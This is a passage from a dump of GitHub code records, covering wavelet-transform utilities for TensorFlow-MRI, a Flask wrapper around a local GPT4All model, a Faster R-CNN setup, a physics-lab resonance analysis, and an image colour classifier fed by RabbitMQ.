[_as_wavelet(wavelet[0])] * len(axes)\n else:\n if len(wavelet) != len(axes):\n raise ValueError((\n \"The number of wavelets must match the number of axes \"\n \"to be transformed.\"))\n wavelets = [_as_wavelet(w) for w in wavelet]\n else:\n raise ValueError(\"wavelet must be a str, Wavelet or iterable\")\n return wavelets\n\n\ndef _wavelet_lengths_per_axis(wavelet_or_length, axes):\n \"\"\"Get wavelet lengths for each axis to be transformed.\n\n Args:\n wavelet_or_length: An `int`, `str`, `Wavelet` or an iterable of `int`,\n `str` or `Wavelet`. If a scalar input is provided, it will used for\n all axes. Otherwise one input per axis must be provided.\n axes: The `list` of axes to be transformed.\n\n Returns:\n A `list` of lengths equal in length to `axes`.\n\n Raises:\n ValueError: If `wavelet_or_length` is not valid for the given `axes`.\n \"\"\"\n axes = tuple(axes)\n if isinstance(wavelet_or_length, (int, str, pywt.Wavelet)):\n # Same wavelet/length on all axes.\n lengths = [_get_wavelet_length(wavelet_or_length)] * len(axes)\n elif isinstance(wavelet_or_length, collections.abc.Iterable):\n # (potentially) unique wavelet_or_length per axis (e.g. for dual-tree DWT)\n if len(wavelet_or_length) == 1:\n lengths = [_get_wavelet_length(wavelet_or_length[0])] * len(axes)\n else:\n if len(wavelet_or_length) != len(axes):\n raise ValueError((\n \"The number of wavelets or lengths must match the number of axes \"\n \"to be transformed.\"))\n lengths = [_get_wavelet_length(w) for w in wavelet_or_length]\n else:\n raise ValueError(\n \"wavelet_or_length must be an int, str, wavelet or iterable\")\n return lengths\n\n\ndef _get_wavelet_length(wavelet_or_length):\n if isinstance(wavelet_or_length, (str, pywt.Wavelet)):\n return _as_wavelet(wavelet_or_length).dec_len\n return wavelet_or_length\n\n\ndef _modes_per_axis(mode, axes):\n \"\"\"Initialize mode for each axis to be transformed.\n\n Args:\n mode: A `str` or an iterable of `str`. If a single mode is provided, it\n will used for all axes. Otherwise one mode per axis must be provided.\n axes: The `list` of axes to be transformed.\n\n Returns:\n A `list` of mode equal in length to `axes`.\n\n Raises:\n ValueError: If `mode` is not valid for the given `axes`.\n \"\"\"\n axes = tuple(axes)\n if isinstance(mode, str):\n # same mode on all axes\n mode = [mode] * len(axes)\n elif isinstance(mode, collections.abc.Iterable):\n if len(mode) == 1:\n mode = [mode[0]] * len(axes)\n else:\n if len(mode) != len(axes):\n raise ValueError(\n \"The number of mode must match the number \"\n \"of axes to be transformed.\")\n mode = [str(mode) for mode in mode]\n else:\n raise ValueError(\"mode must be a str or iterable\")\n return mode\n\n\ndef _as_wavelet(wavelet): # pylint: disable=missing-param-doc\n \"\"\"Convert wavelet name to a Wavelet object.\"\"\"\n if not isinstance(wavelet, (pywt.ContinuousWavelet, pywt.Wavelet)):\n wavelet = pywt.DiscreteContinuousWavelet(wavelet)\n if isinstance(wavelet, pywt.ContinuousWavelet):\n raise ValueError(\n \"A ContinuousWavelet object was provided, but only discrete \"\n \"Wavelet objects are supported by this function. A list of all \"\n \"supported discrete wavelets can be obtained by running:\\n\"\n \"print(pywt.wavelist(kind='discrete'))\")\n return wavelet\n\n\ndef _fix_coeffs(coeffs): # pylint: disable=missing-function-docstring\n missing_keys = [k for k, v in coeffs.items() if v is None]\n if missing_keys:\n raise ValueError(\n \"The following detail coefficients were set to None:\\n\"\n \"{0}\\n\"\n \"For multilevel transforms, rather than setting\\n\"\n \"\\tcoeffs[key] = None\\n\"\n \"use\\n\"\n \"\\tcoeffs[key] = np.zeros_like(coeffs[key])\\n\".format(\n missing_keys))\n\n invalid_keys = [k for k, v in coeffs.items() if\n not set(k) <= set('ad')]\n if invalid_keys:\n raise ValueError(\n \"The following invalid keys were found in the detail \"\n \"coefficient dictionary: {}.\".format(invalid_keys))\n\n key_lengths = [len(k) for k in coeffs.keys()]\n if len(np.unique(key_lengths)) > 1:\n raise ValueError(\n \"All detail coefficient names must have equal length.\")\n\n return dict((k, tf.convert_to_tensor(v)) for k, v in coeffs.items())\n\n\ndef _check_level(sizes, dec_lens, level): # pylint: disable=missing-function-docstring\n if np.isscalar(sizes):\n sizes = (sizes, )\n if np.isscalar(dec_lens):\n dec_lens = (dec_lens, )\n max_level = np.min([dwt_max_level(s, d) for s, d in zip(sizes, dec_lens)])\n if level is None:\n level = max_level\n elif level < 0:\n raise ValueError(\n \"Level value of %d is too low . Minimum level is 0.\" % level)\n elif level > max_level:\n warnings.warn(\n (\"Level value of {} is too high: all coefficients will experience \"\n \"boundary effects.\").format(level))\n return level\n\n\ndef _prep_axes_wavedec(shape, axes): # pylint: disable=missing-function-docstring\n rank = shape.rank\n if rank < 1:\n raise ValueError(\"Expected at least 1D input data.\")\n if np.isscalar(axes):\n axes = (axes,)\n if axes is None:\n axes = range(rank)\n else:\n axes = tuple(axes)\n if len(axes) != len(set(axes)):\n raise ValueError(\"The axes passed to wavedec must be unique.\")\n try:\n axes_shapes = [shape[ax] for ax in axes]\n except IndexError:\n raise np.AxisError(\"Axis greater than data dimensions\") # pylint: disable=raise-missing-from\n rank_transform = len(axes)\n return axes, axes_shapes, rank_transform\n\n\ndef _match_coeff_dims(a_coeff, d_coeff_dict): # pylint: disable=missing-function-docstring\n # For each axis, compare the approximation coeff shape to one of the\n # stored detail coeffs and truncate the last element along the axis\n # if necessary.\n if a_coeff is None:\n return None\n if not d_coeff_dict:\n return a_coeff\n d_coeff = d_coeff_dict[next(iter(d_coeff_dict))]\n size_diffs = np.subtract(a_coeff.shape, d_coeff.shape)\n if np.any((size_diffs < 0) | (size_diffs > 1)):\n raise ValueError(f\"incompatible coefficient array sizes: {size_diffs}\")\n return a_coeff[tuple(slice(s) for s in d_coeff.shape)]\n\n\n@api_util.export(\"signal.max_wavelet_level\")\ndef dwt_max_level(shape, wavelet_or_length, axes=None):\n \"\"\"Computes the maximum useful level of wavelet decomposition.\n\n Returns the maximum level of decomposition suitable for use with\n `tfmri.signal.wavedec`.\n\n The level returned is the minimum along all axes.\n\n Examples:\n >>> import tensorflow_mri as tfmri\n >>> tfmri.signal.max_wavelet_level((64, 32), 'db2')\n 3\n\n Args:\n shape: An `int` or a `list` thereof. The input shape.\n wavelet_or_length: A `str`, a `pywt.Wavelet`_. Alternatively, it may also be\n an `int` representing the length of the decomposition filter. This can\n also be a `list` containing a wavelet or filter length for each axis.\n axes: An `list` of `int`. Axes over which the DWT is to be computed.\n If `None` (default), it is assumed that the DWT will be computed along\n all axes.\n\n Returns:\n An `int` representing the maximum useful level of decomposition.\n \"\"\"\n # Canonicalize shape.\n if isinstance(shape, int):\n shape = [shape]\n shape = tf.TensorShape(shape)\n\n # Determine the axes and shape for the transform.\n axes, axes_shapes, _ = _prep_axes_wavedec(shape, axes)\n\n # Get the filter length for each transformed axis.\n lengths = _wavelet_lengths_per_axis(wavelet_or_length, axes)\n\n # Maximum level of decomposition per axis.\n max_levels = [_dwt_max_level(input_length, filter_length)\n for input_length, filter_length in zip(axes_shapes, lengths)]\n return min(max_levels)\n\n\ndef _dwt_max_level(input_length, filter_length):\n if filter_length <= 1 or input_length < filter_length - 1:\n return 0\n\n return _log2_int(input_length // (filter_length - 1))\n\n\ndef _log2_int(x):\n \"\"\"Returns the integer log2 of x.\"\"\"\n return x.bit_length() - 1\n\n\n@api_util.export(\"signal.wavelet_coeffs_to_tensor\")\ndef coeffs_to_tensor(coeffs, padding=0, axes=None):\n \"\"\"Arranges a wavelet coefficient list into a single tensor.\n\n Args:\n coeffs: A `list` of wavelet coefficients as returned by\n `tfmri.signal.wavedec`.\n padding: The value to use for the background if the coefficients cannot be\n tightly packed. If None, raise an error if the coefficients cannot be\n tightly packed.\n axes: Axes over which the DWT that created `coeffs` was performed. The\n default value of `None` corresponds to all axes.\n\n Returns:\n A `tuple` (`tensor`, `slices`) holding the coefficients\n `tf.Tensor` and a `list` of slices corresponding to each coefficient. For\n example, in a 2D tensor, `tensor[slices[1]['dd']]` would extract\n the first level detail coefficients from `tensor`.\n\n Raises:\n ValueError: If passed invalid inputs.\n\n Notes\n -----\n Assume a 2D coefficient dictionary, `c`, from a two-level transform.\n\n Then all 2D coefficients will be stacked into a single larger 2D array\n as follows::\n\n .. code-block::\n\n +---------------+---------------+-------------------------------+\n | | | |\n | c[0] | c[1]['da'] | |\n | | | |\n +---------------+---------------+ c[2]['da'] |\n | | | |\n | c[1]['ad'] | c[1]['dd'] | |\n | | | |\n +---------------+---------------+ ------------------------------+\n | | |\n | | |\n | | |\n | c[2]['ad'] | c[2]['dd'] |\n | | |\n | | |\n | | |\n +-------------------------------+-------------------------------+\n\n If the transform was not performed with mode \"periodization\" or the signal\n length was not a multiple of ``2**level``, coefficients at each subsequent\n scale will not be exactly 1/2 the size of those at the previous level due\n to additional coefficients retained to handle the boundary condition. In\n these cases, the default setting of `padding=0` indicates to pad the\n individual coefficient arrays with 0 as needed so that they can be stacked\n into a single, contiguous array.\n\n Examples:\n >>> import tensorflow_mri as tfmri\n >>> image = tfmri.image.phantom()\n >>> coeffs = tfmri.signal.wavedec(image, wavelet='db2', level=3)\n >>> tensor, slices = tfmri.signal.wavelet_coeffs_to_tensor(coeffs)\n \"\"\"\n coeffs, axes, ndim, ndim_transform = _prepare_coeffs_axes(coeffs, axes)\n\n # initialize with the approximation coefficients.\n a_coeffs = coeffs[0]\n a_shape = a_coeffs.shape\n\n if len(coeffs) == 1:\n # only a single approximation coefficient array was found\n return a_coeffs, [tuple([slice(None)] * ndim)]\n\n # determine size of output and if tight packing is possible\n arr_shape, is_tight_packing = _determine_coeff_array_shape(coeffs, axes)\n\n # preallocate output array\n if padding is None:\n if not is_tight_packing:\n raise ValueError(\"array coefficients cannot be tightly packed\")\n coeff_tensor = tf.zeros(arr_shape, dtype=a_coeffs.dtype)\n else:\n coeff_tensor = tf.fill(arr_shape, tf.cast(padding, a_coeffs.dtype))\n\n a_slices = tuple(slice(s) for s in a_shape)\n coeff_tensor = array_ops.update_tensor(coeff_tensor, a_slices, a_coeffs)\n\n # initialize list of coefficient slices\n coeff_slices = []\n coeff_slices.append(a_slices)\n\n # loop over the detail cofficients, adding them to coeff_tensor\n ds = coeffs[1:]\n for coeff_dict in ds:\n coeff_slices.append({}) # new dictionary for detail coefficients\n if any(d is None for d in coeff_dict.values()):\n raise ValueError(\"coeffs_to_tensor does not support missing \"\n \"coefficients.\")\n d_shape = coeff_dict['d' * ndim_transform].shape\n for key in coeff_dict.keys():\n d = coeff_dict[key]\n slice_array = [slice(None)] * ndim\n for i, let in enumerate(key):\n ax_i = axes[i] # axis corresponding to this transform index\n if let == 'a':\n slice_array[ax_i] = slice(d.shape[ax_i])\n elif let == 'd':\n slice_array[ax_i] = slice(a_shape[ax_i],\n a_shape[ax_i] + d.shape[ax_i])\n else:\n raise ValueError(\"unexpected letter: {}\".format(let))\n slice_array = tuple(slice_array)\n coeff_tensor = array_ops.update_tensor(coeff_tensor, slice_array, d)\n coeff_slices[-1][key] = slice_array\n a_shape = [a_shape[n] + d_shape[n] for n in range(ndim)]\n return coeff_tensor, coeff_slices\n\n\n@api_util.export(\"signal.tensor_to_wavelet_coeffs\")\ndef tensor_to_coeffs(coeff_tensor, coeff_slices):\n \"\"\"Extracts wavelet coefficients from tensor into a list.\n\n Args:\n coeff_tensor: A `tf.Tensor` containing all wavelet coefficients. This should\n have been generated via `tfmri.signal.wavelet_coeffs_to_tensor`.\n coeff_slices : A `list` of slices corresponding to each coefficient as\n obtained from `tensor_to_wavelet_coeffs`.\n\n Returns:\n The wavelet coefficients in the format expected by `tfmri.signal.waverec`.\n\n Raises:\n ValueError: If passed an empty list of coefficients.\n\n Notes:\n A single large array containing all coefficients will have subsets stored,\n into a `waverecn`` list, c, as indicated below::\n\n .. code-block::\n\n +---------------+---------------+-------------------------------+\n | | | |\n | c[0] | c[1]['da'] | |\n | | | |\n +---------------+---------------+ c[2]['da'] |\n | | | |\n | c[1]['ad'] | c[1]['dd'] | |\n | | | |\n +---------------+---------------+ ------------------------------+\n | | |\n | | |\n | | |\n | c[2]['ad'] | c[2]['dd'] |\n | | |\n | | |\n | | |\n +-------------------------------+-------------------------------+\n\n Examples:\n >>> import tensorflow_mri as tfmri\n >>> image = tfmri.image.phantom()\n >>> coeffs = tfmri.signal.wavedec(image, wavelet='db2', level=3)\n >>> tensor, slices = tfmri.signal.wavelet_coeffs_to_tensor(coeffs)\n >>> coeffs_from_arr = tfmri.signal.tensor_to_wavelet_coeffs(tensor, slices)\n >>> image_recon = tfmri.signal.waverec(coeffs_from_arr, wavelet='db2')\n >>> # image and image_recon are equal\n \"\"\"\n coeff_tensor = tf.convert_to_tensor(coeff_tensor)\n coeffs = []\n if len(coeff_slices) == 0:\n raise ValueError(\"empty list of coefficient slices\")\n coeffs.append(coeff_tensor[coeff_slices[0]])\n\n # difference coefficients at each level\n for n in range(1, len(coeff_slices)):\n d = {}\n for k, v in coeff_slices[n].items():\n d[k] = coeff_tensor[v]\n coeffs.append(d)\n return coeffs\n\n\ndef _determine_coeff_array_shape(coeffs, axes): # pylint: disable=missing-param-doc\n \"\"\"Determines the shape of the coefficients array.\"\"\"\n arr_shape = np.asarray(coeffs[0].shape)\n axes = np.asarray(axes) # axes that were transformed\n ndim_transform = len(axes)\n ncoeffs = coeffs[0].shape.num_elements()\n for d in coeffs[1:]:\n arr_shape[axes] += np.asarray(d['d'*ndim_transform].shape)[axes]\n for _, v in d.items():\n ncoeffs += v.shape.num_elements()\n arr_shape = tuple(arr_shape.tolist())\n # if the total number of coefficients doesn't equal the size of the array\n # then tight packing is not possible.\n is_tight_packing = (np.prod(arr_shape) == ncoeffs)\n return arr_shape, is_tight_packing\n\n\ndef _prepare_coeffs_axes(coeffs, axes): # pylint: disable=missing-param-doc\n \"\"\"Helper function to check type of coeffs and axes.\n\n This code is used by both coeffs_to_tensor and ravel_coeffs.\n \"\"\"\n if not isinstance(coeffs, list) or len(coeffs) == 0:\n raise ValueError(\"input must be a list of coefficients from wavedec\")\n if coeffs[0] is None:\n raise ValueError(\"coeffs_to_tensor does not support missing \"\n \"coefficients.\")\n if not isinstance(coeffs[0], tf.Tensor):\n raise ValueError(\"first list element must be a tensor\")\n ndim = coeffs[0].ndim\n\n if len(coeffs) > 1:\n if not isinstance(coeffs[1], dict):\n raise ValueError(\"invalid coefficient list\")\n\n if len(coeffs) == 1:\n # no detail coefficients were found\n return coeffs, axes, ndim, None\n\n # Determine the number of dimensions that were transformed via key length\n ndim_transform = len(list(coeffs[1].keys())[0])\n if axes is None:\n if ndim_transform < ndim:\n raise ValueError(\n \"coeffs corresponds to a DWT performed over only a subset of \"\n \"the axes. In this case, axes must be specified.\")\n axes = np.arange(ndim)\n\n if isinstance(axes, int):\n axes = [axes]\n\n if len(axes) != ndim_transform:\n raise ValueError(\n \"The length of axes doesn't match the number of dimensions \"\n \"transformed.\")\n\n return coeffs, axes, ndim, ndim_transform\n","repo_name":"mrphys/tensorflow-mri","sub_path":"tensorflow_mri/python/ops/wavelet_ops.py","file_name":"wavelet_ops.py","file_ext":"py","file_size_in_byte":35787,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"3"}
+{"seq_id":"72230170962","text":"# This is a sample Python script.\nimport json\n\nfrom langchain import PromptTemplate, LLMChain\nfrom langchain.llms import GPT4All\nfrom langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler\n\nimport offset as of\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n\ndef evaluate(question):\n # Use a breakpoint in the code line below to debug your script.\n template = \"\"\"Question: {question}\n\nAnswer: Rewrite the input in a happy tone. \"\"\"\n\n prompt = PromptTemplate(template=template, input_variables=[\"question\"])\n\n local_path = (\n # \"D:\\workspace\\gpt4\\gptall\\ggml-gpt4all-l13b-snoozy.bin\" # replace with your desired local file path\n \"D:\\workspace\\gpt4\\gptall\\ggml-gpt4all-j.bin\"\n )\n\n # Callbacks support token-wise streaming\n callbacks = [StreamingStdOutCallbackHandler()]\n # Verbose is required to pass to the callback manager\n llm = GPT4All(model=local_path, callbacks=callbacks, verbose=True)\n # If you want to use a custom model add the backend parameter\n # Check https://docs.gpt4all.io/gpt4all_python.html for supported backends\n llm = GPT4All(model=local_path, backend=\"gptj\", callbacks=callbacks, verbose=True)\n\n llm_chain = LLMChain(prompt=prompt, llm=llm)\n\n\n\n return llm_chain.run(question)\n\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n@app.route('/chat',methods=[\"POST\"])\ndef hello_flask():\n try:\n question = request.values.get('input')\n #body = request.json.get(\"content\").strip()\n #print(body)\n if not question:\n raise ValueError('Missing parameter')\n results = evaluate(question)\n offset_result = of.calc_offset(question,results)\n my_dict = {}\n my_dict['input'] = question\n my_dict['result'] = results\n my_dict['offset'] = offset_result\n return json.dumps(my_dict, ensure_ascii=False)\n except ValueError as e:\n # 处理异常情况\n error = {'error': str(e)}\n return jsonify(error), 400\n except Exception as e:\n # 记录异常信息\n app.logger.error(f'Unexpected error: {str(e)}')\n error = {'error': 'Internal server error'}\n return jsonify(error), 500\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=8989, debug=False)\n","repo_name":"ZhangTai123/gpt4all-api-exploit-for-window10","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"25639501536","text":"from torchvision.models.detection import fasterrcnn_resnet50_fpn, FasterRCNN_ResNet50_FPN_Weights\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torch import nn\nfrom torchvision.models.detection.transform import GeneralizedRCNNTransform\nimport torchvision.models.detection.transform as T\n\ndef get_model_object_detection(num_classes = 2):\n \n model = fasterrcnn_resnet50_fpn(weights= FasterRCNN_ResNet50_FPN_Weights.DEFAULT)\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n\n return model\n\ndef get_temp_model(num_classes = 2):\n \n model = fasterrcnn_resnet50_fpn(weights= FasterRCNN_ResNet50_FPN_Weights.DEFAULT)\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n \n ## change first convolution to take 3*3 channels as inputs --> 9\n model.backbone.body.conv1 = nn.Conv2d(9, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n \n image_mean = [0.485, 0.456, 0.406, 0.485, 0.456, 0.406, 0.485, 0.456, 0.406]\n image_std = [0.229, 0.224, 0.225, 0.229, 0.224, 0.225, 0.229, 0.224, 0.225]\n T=GeneralizedRCNNTransform(800, 1333, image_mean, image_std)\n model.transform = T\n\n ## check trainabe parameters\n #params = [p for p in model.parameters() if p.requires_grad]\n\n return model\n ","repo_name":"aureliedj/bird_detection","sub_path":"utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39710638677","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 14 15:21:35 2017\n\n@author: Sebastian\n\"\"\"\n\nimport Praktikum as p\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nef = 5\n\nwiderstand = \"10\"\ndata = p.lese_lab_datei(\"{0:s}Ohm.lab\".format(widerstand))\n\nU = data[:,2]\nI = data[:,3]\n\nphi = data[:,4]\n\nUL = data[:,5]\n\nUC = data[:,6]\n\nf = data[:,8]\n\n\n\n### Breite Strom\n\ndef strombreite(f, I):\n i = np.argmax(I)\n f0 = f[i]\n Imax = np.max(I)\n \n f1 = f[np.argmax(-np.abs(I[0:i]-Imax/np.sqrt(2)))]\n \n f2 = f[np.argmax(-np.abs(I[i:-1]-Imax/np.sqrt(2)))+i]\n \n return Imax, f0, f1, f2\n\nImax, f0, f1, f2 = strombreite(f, I)\n\nplt.figure(1)\nplt.plot(f, -np.abs(I-Imax/np.sqrt(2)))\nplt.plot(f, I)\nplt.axvline(f0)\nplt.axvline(f1)\nplt.axvline(f2)\n\nprint (f0)\nprint(f1)\nprint(f2)\n\nQ1 = f0/(f2-f1)\neQ1 = Q1* np.sqrt( (ef/f0)**2 + (np.sqrt(2)*ef/(f2-f1))**2 )\n\n_, f01, f11, f21 = strombreite(f, I+0.005*0.7)\n_, f02, f12, f22 = strombreite(f, I-0.005*0.7)\n\nQ11 = f01/(f21-f11)\nQ12 = f02/(f22-f12)\n\n\n### Breite Phasenverschiebung\n\ndef phasenbreite(f, phi):\n i = np.argmax(-np.abs(phi))\n f0 = f[i]\n \n f1 = f[ np.argmax( -np.abs(phi-45) ) ]\n f2 = f[ np.argmax( -np.abs(phi+45) ) ]\n return f0, f1, f2, i\n\nf0, f1, f2, i = phasenbreite(f, phi)\n\nplt.figure(2)\nplt.plot(f, phi)\nplt.plot(f, np.concatenate((-np.abs(phi[:i]-45), -np.abs(phi[i:]+45))))\nplt.axvline(f0)\nplt.axvline(f1)\nplt.axvline(f2)\n\nprint(f0)\nprint(f1)\nprint(f2)\n\nQ2 = f0/(f2-f1)\neQ2 = Q2* np.sqrt( (ef/f0)**2 + (np.sqrt(2)*ef/(f2-f1))**2 )\n\n\n\n### Spannungsüberhöhung\n\ndef spannung(f, UL, UC):\n i = np.argmax(-abs(UL-UC))\n U_max = ((UL+UC)/2)[i]\n f0 = f[i]\n \n return U_max, f0\n\nU_max, f0 = spannung(f, UL, UC)\n\nU0 = np.mean(U)\n\neU0 = np.std(U, ddof=1) *3\neU_max = eU0\n\nplt.figure(3)\nplt.plot(f, UL)\nplt.plot(f, UC)\nplt.axhline(U_max)\nplt.axvline(f0)\n\nQ3 = U_max/U0\neQ3 = Q3 * np.sqrt( (eU_max/U_max)**2 + (eU0/U0)**2 )\n\n\nU_max, _ = spannung(f, UL+0.01*UL+0.005*7, UC+0.01*UC+0.005*7)\nQ31 = U_max/(U0)#+0.01*U0+0.005*7)\n\nU_max, _ = spannung(f, UL-0.01*UL-0.005*7, UC-0.01*UC-0.005*7)\nQ32 = U_max/(U0)#-0.01*U0-0.005*7)\n\n\n\nplt.figure(4)\nplt.errorbar(f, I, fmt=\".\")\nplt.title(\"{0:s} Ohm Widerstand - Gesamtstrom\".format(widerstand))\nplt.xlabel(\"f / Hz\")\nplt.ylabel(\"I / A\")\n\n\nplt.figure(5)\nplt.errorbar(f, UL, fmt=\".\")\nplt.errorbar(f, UC, fmt=\".\")\nplt.title(\"{0:s} Ohm Widerstand - Spannung L und C\".format(widerstand))\nplt.xlabel(\"f / Hz\")\nplt.ylabel(\"U / V\")\nplt.figtext(0.22, 0.67, \"$U_C$\")\nplt.figtext(0.35, 0.28, \"$U_L$\")\n\n\nplt.figure(6)\nplt.errorbar(f, phi, fmt=\".\")\nplt.title(\"{0:s} Ohm Widerstand - Phase\".format(widerstand))\nplt.xlabel(\"f / Hz\")\nplt.ylabel(\"$\\phi$ / Grad\")\n","repo_name":"thewhitecat/grundpraktikum1","sub_path":"grundpraktikum2/E-Lehre/Gruppe A/untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23197290894","text":"import StringIO\nimport os\n\nclass QOpen(StringIO.StringIO):\n def __init__(self, *args):\n self.__args = args\n StringIO.StringIO.__init__(self)\n\n def close(self):\n import StringIO, os\n fname = self.__args[0]\n if not os.access(fname, os.R_OK) or self.getvalue() != open(fname).read():\n open(*self.__args).write(self.getvalue())\n StringIO.StringIO.close(self)\n\n def __del__(self):\n if not self.closed:\n self.close()\n","repo_name":"fursund/EmguCV-Unity","sub_path":"opencv/doc/latex2sphinx/qfile.py","file_name":"qfile.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"3"}
+{"seq_id":"939351264","text":"import os\n\nfrom PIL import Image\n\nfrom buttons.button import ButtonBase\nfrom gadgets.aten import Aten\nfrom store import store\n\n\nclass AtenSwitchButton(ButtonBase):\n\n def __init__(self, aten: Aten):\n super().__init__()\n self.aten = aten\n aten.switch(1)\n self.selected = 4\n self.image = self.icon()\n\n def icon(self):\n i = Image.open(os.path.abspath(f\"./assets/icons/4or5_{self.selected}.png\"))\n return i\n\n def on_press(self):\n if self.selected == 4:\n self.aten.switch(2)\n self.selected = 5\n store.aten_cam.value = 5\n else:\n self.aten.switch(1)\n self.selected = 4\n store.aten_cam.value = 4\n self.image = self.icon()\n","repo_name":"renagaev/streaming-scripts","sub_path":"buttons/AtenSwitchButton.py","file_name":"AtenSwitchButton.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"2922204139","text":"import numpy as np\nimport os\nimport sys\nimport cv2\n\n\nclass ImageWebColor:\n \"\"\"Selection of webcolor for image\"\"\"\n\n def __init__(self, path, image_name, bits_per_color_channel=8):\n \"\"\"Initialize image name and bits per color channel, read image\n\n Note: possibility to change color depth\"\"\"\n self.web_colors_definition = [(\"White\", [100, 100, 100]), (\"Silver\", [75, 75, 75]),\n (\"Gray\", [50, 50, 50]), (\"Black\", [0, 0, 0]),\n (\"Red\", [100, 0, 0]), (\"Maroon\", [50, 0, 0]),\n (\"Yellow\", [100, 100, 0]), (\"Olive\", [50, 50, 0]),\n (\"Lime\", [0, 100, 0]), (\"Green\", [0, 50, 0]),\n (\"Aqua\", [0, 100, 100]), (\"Teal\", [0, 50, 50]),\n (\"Blue\", [0, 0, 100]), (\"Navy\", [0, 0, 50]),\n (\"Fuchsia\", [100, 0, 100]), (\"Purple\", [50, 0, 50])]\n self.image_name = image_name\n self.image = cv2.imread(os.path.join(path, self.image_name), -1)\n self.bits_per_color_channel = bits_per_color_channel\n self.mean_color = None\n\n def compute_image_color_mean(self):\n \"\"\"Parameters:\n returns - compute mean color\n\n Overall description: Compute the arithmetic mean of the image\"\"\"\n\n # check image dimensions, for grayscale images all RGB channels will be same\n if self.image.ndim < 3:\n img_mean_blue_channel = img_mean_green_channel = img_mean_red_channel = np.mean(self.image[:, :])\n else:\n img_mean_blue_channel = np.mean(self.image[:, :, 0]) # get color mean - channel Blue\n img_mean_green_channel = np.mean(self.image[:, :, 1]) # get color mean - channel Green\n img_mean_red_channel = np.mean(self.image[:, :, 2]) # get color mean - channel Red\n\n # color channels in percent according to color depth\n img_mean_color = [(img_mean_red_channel / ((2 ** self.bits_per_color_channel) - 1)) * 100,\n (img_mean_green_channel / ((2 ** self.bits_per_color_channel) - 1)) * 100,\n (img_mean_blue_channel / ((2 ** self.bits_per_color_channel) - 1)) * 100]\n self.mean_color = img_mean_color\n return img_mean_color\n\n def select_webcolor_for_image(self):\n \"\"\"Parameters:\n img_mean_color - average color value ||\n web_colors_definition - define web colors for selection ||\n returns - selected web color for image\n\n Overall description: Select webcolor for the image\n \"\"\"\n if not self.mean_color:\n self.compute_image_color_mean()\n web_colors_definition_values = []\n\n # get values form tuple\n for values in self.web_colors_definition:\n web_colors_definition_values.append(values[1])\n web_colors = np.array(web_colors_definition_values)\n img_mean_color_np = np.array(self.mean_color)\n distances = np.sqrt(np.sum((web_colors - img_mean_color_np) ** 2, axis=1))\n smallest_distance_index = np.where(distances == np.amin(distances))\n smallest_distance_index = smallest_distance_index[0]\n smallest_distance = web_colors[smallest_distance_index]\n print(self.image_name, self.web_colors_definition[int(smallest_distance_index[0])][0], smallest_distance,\n img_mean_color_np)\n\n # return closest webcolor\n return self.web_colors_definition[int(smallest_distance_index[0])][0]\n\n\ndef check_path_and_img_input(path, image_name):\n \"\"\"Check if image is valid\"\"\"\n try:\n os.listdir(path)\n except OSError as error:\n print(error)\n raise\n\n img_path = os.path.join(path, image_name)\n image = cv2.imread(img_path, -1)\n if image is None:\n sys.exit(\"[Error]: Input is an invalid image or path is not correct\")\n\n\ndef get_image_web_color():\n \"\"\"Establish connection, receive message: path and image name, call validation function,\n create instance and call methods, send message: webcolor, path and image name\"\"\"\n\n\n import pika\n queue_name = \"m1_get_files_to_m2_compute\"\n\n # establishing connection\n connection = pika.BlockingConnection(pika.ConnectionParameters(host='host.docker.internal'))\n channel = connection.channel()\n\n # creating queue\n channel.queue_declare(queue=queue_name)\n\n # Receiving messages from the queue - subscribing a callback function to a queue\n def callback(ch, method, properties, body):\n # Receiving message\n received_path_image_name = body.decode('utf8')\n print(\" [x] Received:\", received_path_image_name, \" => running module2\")\n path_image_name = received_path_image_name.split(\";\")\n path_image_name_relative = path_image_name[0]\n path_image_name[0] = \"docker-shared/\" + path_image_name[0]\n\n # validate inputs, compute webcolor for the image\n check_path_and_img_input(path_image_name[0], path_image_name[1])\n image_24bit = ImageWebColor(path_image_name[0], path_image_name[1])\n selected_webcolor = image_24bit.select_webcolor_for_image()\n print(\"=> Selected webcolor: \", selected_webcolor, \" for image: \", path_image_name[1])\n\n # create message\n queue_m2_to_m3 = \"m2_compute_to_m3_save_images\"\n channel.queue_declare(queue=queue_m2_to_m3)\n webcolor_path_image_name = [selected_webcolor, path_image_name_relative, path_image_name[1]]\n webcolor_path_image_name = ';'.join([str(elem) for elem in webcolor_path_image_name])\n message_webcolor_path_image_name = bytes(webcolor_path_image_name, 'utf8')\n\n # send message\n channel.basic_publish(exchange='', routing_key=queue_m2_to_m3, body=message_webcolor_path_image_name)\n print(\" [x] Sent message with webcolor, path, image name:\", message_webcolor_path_image_name.decode('utf8'))\n print(\"=> Module 2 finished...\")\n print(' [*] Waiting for messages. To exit press CTRL+C')\n\n # Callback function will receive messages from specified queue\n channel.basic_consume(queue=queue_name, on_message_callback=callback, auto_ack=True)\n\n # 